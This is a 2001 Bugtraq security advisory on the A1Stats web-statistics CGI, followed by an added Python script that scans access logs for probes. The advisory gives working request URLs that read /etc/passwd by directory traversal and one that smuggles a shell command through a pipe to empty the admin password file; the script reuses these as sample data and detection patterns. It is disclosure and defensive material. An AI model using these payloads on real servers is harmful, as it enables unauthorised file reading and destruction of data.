[20568] in bugtraq
Advisory for A1Stats
daemon@ATHENA.MIT.EDU (neme-dhc@HUSHMAIL.COM)
Tue May 8 11:21:16 2001
Message-ID: <200105072328.QAA21115@user7.hushmail.com>
Date: Mon, 7 May 2001 19:31:12 -0500
Reply-To: neme-dhc@HUSHMAIL.COM
From: neme-dhc@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
[ Advisory for A1Stats ]
[ A1Stats is made by Drummond Miles ]
[ Site: http://www.gadnet.com/a1stats ]
[ by nemesystm of the DHC ]
[ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
[ ADV-0114 ]
/-|=[explanation]=|-\
A1Stats is a CGI package to track website traffic.
The package has a bug that lets a visitor view
arbitrary files, and it also makes it possible to
overwrite existing files.
/-|=[who is vulnerable]=|-\
Anyone using a copy of A1Stats that was downloaded
before 24/04/01.
/-|=[testing it]=|-\
To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
These two will give you /etc/passwd.
www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd
This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.
One can also open a file and wreck its contents.
http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.
/-|=[fix]=|-\
Downloading the latest version will solve this
problem.
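
For administrators checking whether an installation was probed, the following is an added example and not part of the original advisory or of A1Stats. It flags access-log requests to the a1disp*.cgi scripts whose query string contains a ".." path component or pipe/redirection characters, and it goes beyond the literal URLs above by also undoing repeated percent-encoding and accepting backslash separators. The Common Log Format and the sample lines (including the file name stats0501.txt) are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Request line of a Common Log Format entry (the log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Display scripts named in the advisory: a1disp.cgi, a1disp2.cgi ... a1disp4.cgi
SCRIPT = re.compile(r"/a1stats/a1disp\d*\.cgi$", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up response sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/May/2001:11:02:01 -0500] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd HTTP/1.0" 200 1432',
    '192.0.2.10 - - [08/May/2001:11:02:09 -0500] "GET /cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt| HTTP/1.0" 200 0',
    '192.0.2.44 - - [08/May/2001:11:05:40 -0500] "GET /cgi-bin/a1stats/a1disp2.cgi?%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 87',
    '198.51.100.7 - - [08/May/2001:11:06:12 -0500] "GET /cgi-bin/a1stats/a1disp.cgi?stats0501.txt HTTP/1.0" 200 5120',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the set of findings for one log line (empty if nothing matched)."""
    m = REQUEST.search(log_line)
    if not m:
        return set()
    path, _, query = m.group(1).partition("?")
    if not SCRIPT.search(fully_decode(path)):
        return set()
    query = fully_decode(query)
    findings = set()
    if ".." in re.split(r"[\\/]", query):   # a ".." path component
        findings.add("traversal")
    if re.search(r"[|<>;`]", query):        # pipe or redirection characters
        findings.add("shell-metachar")
    return findings

def scan(lines):
    """Return (line number, sorted findings) for every flagged line."""
    hits = [(n, sorted(classify(line))) for n, line in enumerate(lines, 1)]
    return [h for h in hits if h[1]]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(findings)}")
```

A hit shows only that the request was made; compare the logged response size and the state of a1admin.txt to judge whether it succeeded.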